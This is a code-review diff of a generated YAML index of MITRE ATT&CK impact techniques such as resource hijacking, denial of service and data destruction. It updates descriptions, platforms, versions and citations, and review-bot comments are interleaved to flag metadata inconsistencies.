+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
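Review bot: T1496.004 (Cloud Service Hijacking) declares only `SaaS` in `x_mitre_platforms`, while its description is built around AWS SES, AWS SNS and cloud-hosted AI models reached through a provider's own cloud platform; if that scoping is upstream's it is fine, but it will keep this sub-technique out of any IaaS-keyed index. Two smaller things carried in from upstream: the `Sysdig LLMJacking 2024` reference puts the title before the author, unlike every other citation in the file, and the whole T1496.001 description is the text that the later hunk removes from the parent T1496 (same citations, same wording with `Resource Hijacking` swapped for `Compute Hijacking`), so the parent and the sub-technique stay in sync only as long as both are regenerated together.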
@@ -57707,11 +58686,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -57734,6 +58712,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -57751,9 +58730,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -57779,9 +58759,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests: []
T1486:
@@ -57868,7 +58847,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
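Review bot: third backwards `modified` in the diff (T1486, `2022-11-08` to `2022-06-16`), again on an entry that stays at `x_mitre_attack_spec_version: 2.1.0` in the next hunk. Please check it alongside T1491 and T1491.001.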
@@ -57892,12 +58871,11 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests: []
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -57916,7 +58894,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -57933,18 +58910,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
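Review bot: `- - IaaS` followed by `+ - IaaS` in this hunk is a reorder, not a removal; the net change to T1499's platforms is the loss of `Azure AD`, `Office 365`, `SaaS` and `Google Workspace`, with Windows, Linux, macOS, Containers and IaaS remaining. Reading the hunk at a glance suggests IaaS was dropped, so a note in the commit message would help.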
@@ -57968,8 +58940,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -57989,33 +58961,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
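Review bot: the rewritten T1496 description lists four forms of hijacking (compute, bandwidth, SMS traffic, cloud messaging), but this diff only adds T1496.001, T1496.002 and T1496.004. Confirm the SMS sub-technique exists elsewhere in the file, otherwise the parent describes a child that the index does not carry. The new description cites only `Sysdig Cryptojacking Proxyjacking 2023`, which is the one reference added to the parent in the last hunk, so the citation set is consistent after the old references move to the sub-techniques.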
@@ -58026,7 +58987,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
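Review bot: `x_mitre_detection` for T1496 is left unchanged here and still opens with monitoring process resource usage, which is the compute-mining case, even though the description now covers bandwidth sale, SMS traffic and messaging-service abuse and the next hunk adds `SaaS` and `Cloud Service: Cloud Service Modification`. If upstream has not updated the detection text, nothing to do in this PR, but it is a known gap for anyone building detections off this field.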
@@ -58043,8 +59004,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
@@ -58063,99 +59027,73 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests: []
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
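Review bot: `spec_version: '2.1'` is deleted from T1496 and T1565.002 here and, judging by the rest of the patch, from every technique object; that key is the STIX 2.1 marker, so any loader that validates these objects as STIX will now reject them. Either confirm that consumers only read `identifier` and `atomic_tests`, or keep the key. One smaller thing in the same hunk: the replacement Sysdig reference reads `Targeting GitLab .` with a stray space before the period; that is upstream text, so it should be fixed at the source rather than by hand in this generated file.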
@@ -58164,7 +59102,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58190,9 +59128,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
@@ -58248,55 +59187,11 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests: []
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58311,6 +59206,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -58323,16 +59222,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
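Review bot: T1498 loses `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` from `x_mitre_platforms` and gets nothing in return (the list is now Windows, IaaS, Linux, macOS, Containers), whereas T1566.002, T1078.001 and T1199 further down receive `Identity Provider` and `Office Suite` as replacements. Please confirm this mirrors the upstream change and is not the generator dropping platform names it does not recognise. With `atomic_tests: []` there is no index row to remove, so the practical impact is nil, but a data refresh should state a platform removal explicitly. The reference list is also re-emitted in a different order (Cisco first) with a new ic3.gov URL and a 2024 retrieval date for the FS-ISAC alert; harmless.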
@@ -58400,11 +59335,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
